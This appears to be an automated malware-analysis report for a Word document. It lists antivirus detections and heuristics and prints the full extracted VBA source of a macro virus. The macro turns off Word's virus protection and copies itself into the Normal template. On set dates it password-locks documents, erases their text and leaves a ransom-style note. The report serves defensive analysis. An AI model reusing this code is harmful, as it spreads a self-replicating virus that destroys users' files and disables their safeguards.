Malware Insights
The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code upon document opening or closing. The 'Stp' subroutine attempts to copy macros between the active document and the normal template, suggesting an attempt to establish persistence or modify the template. The ClamAV detections (Doc.Trojan.Sr-1 and Win.Trojan.Alicia-3) further confirm its malicious nature. The VBA code's intent appears to be the execution of a secondary payload, though the exact mechanism is obfuscated.
Heuristics 5
-
ClamAV: Doc.Trojan.Sr-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Sr-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3149 bytes |
SHA-256: f4802810927660d48a2f931e4708bac2674cf710411a166ffb8a7e59d037a0f7 |
|||
|
Detection
ClamAV:
Win.Trojan.Alicia-3
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
' ModuleName = "Sr"
Sub Stp()
On Error Resume Next
zz = Word.ActiveDocument.FullName
ee = Normal.ThisDocument.FullName
Application.OrganizerCopy Source:=ee, _
Destination:=zz, Name:="Sr", _
Object:=3
Application.OrganizerCopy Source:=zz, _
Destination:=ee, Name:="Sr", _
Object:=3
Word.NormalTemplate.Save
End Sub
Sub AutoNew()
Word.Options.VirusProtection = False
ActiveDocument.Saved = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Application.Caption = "T" + ""
End Sub
Sub AutoOpen()
Word.Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
ActiveDocument.Saved = False
Application.Caption = "T" + ""
Stp
End Sub
Sub AutoClose()
Word.Options.VirusProtection = False
Application.Caption = "TMicrosoft Word"
Stp
df = Word.ActiveDocument.FullName
qq = DateTime.Date
Drr = Word.Application.Path + "\" + "dc"
If (Dir(Drr, vbDirectory) = "") Then MkDir (Drr)
Pat = Word.Application.Path + "\" + "dc" + "\" + ActiveDocument.Name
If qq = "25.06.01" Or qq = "26.06.01" Or qq = "27.06.01" Or qq = "28.06.01" Or qq = "29.06.01" Or qq = "30.06.01" Then
Application.ActiveDocument.Password = "agl"
ActiveDocument.Saved = False
If ActiveDocument.Content.Find.Execute(FindText:="Hi.") = False Then
ActiveDocument.SaveAs (Pat)
Word.RecentFiles.Item(1).Delete
End If
ActiveDocument.Select
Selection.Delete
Selection.TypeText ("Hi.")
Selection.TypeParagraph
Selection.TypeText ("Данный вирус, это мой первий вирус, пока я тольку учусь, ответ на вопрос: как востановить свои данные вы, пока еще, сможете получить написав мне.")
Selection.TypeParagraph
Selection.TypeText (" Мой адрес treon9875@rambler.ru . До встречи! Кому нужен специализированный вирус пишите, всегда рад помочь")
Selection.TypeParagraph
Word.ActiveWindow.WindowState = wdWindowStateNormal
Word.ActiveWindow.Width = 10
End If
Application.ActiveDocument.Password = ""
ActiveDocument.Saved = False
If Word.ActiveDocument.Path = "" Then
ActiveDocument.Saved = True
ActiveDocument.Saved = False
Else: ActiveDocument.SaveAs (df)
End If
Application.Caption = ""
End Sub
'Sub viewvbcode()
'MsgBox ("Эта возможность заблокирована")
'uf.Show
'If a <> "семья" Then MsgBox ("Пароль не верен") Else Word.WordBasic.AppActivate ("пароль введен")
'End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.